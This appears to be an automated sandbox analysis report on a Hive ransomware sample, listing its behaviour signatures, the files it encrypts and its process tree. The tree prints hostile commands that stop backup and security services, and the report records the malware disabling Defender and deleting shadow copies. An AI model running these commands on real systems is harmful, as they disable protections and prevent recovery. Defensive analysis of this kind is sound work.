Analysis Overview
SHA256
8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927
Threat Level: Known bad
The file d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Hive
Modifies security service
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Runs net.exe
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:49
Reported
2022-01-12 16:54
Platform
win7-en-20211208
Max time kernel
190s
Max time network
125s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_HfWYPhQrYmA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_riMptI5m7HU0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMCCore.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_QVae35UIwqM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_t0FT4y1WQNc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2YkZ_mCLLAQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZyruyCrLZko0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_lR-LH5BGSzA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_dG1gKCL2XYE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_h69GoWNI8Rg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_zuO3f0bQsTo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\MSB1FRAR.ITS.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_EdAzsFPoOrI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_8QcjDG7rB2k0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_TivHynjiEpY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_hlIDUXEtFVY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_sPLEMuIXMUg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_6rB34lbx0Jg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_GNPLvFP_zFw0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H__x8qpQUJIsE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2zSkv8zaRpQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_vnpVUI0zmOQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ydqZ9Eibfxs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_Jb5GmcdELIA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2OXoKfEVGg40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_XmlTqu87f5s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MebdR_icuSY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_k47sWypKUJ00.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_W571iuh6NH40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_tf-jit-Efes0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_bMr12DL6XJI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZU91AzFYbw40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_UlMp6y1OYVs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_4AjEF-b91xo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\SIGNUP\install.ins.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_1CNpioIEzQk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_0Z_gQNoQDd80.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MfeouGtus0c0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_A_J90vBBQkk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Godthab.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_m1IaTRXRn340.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
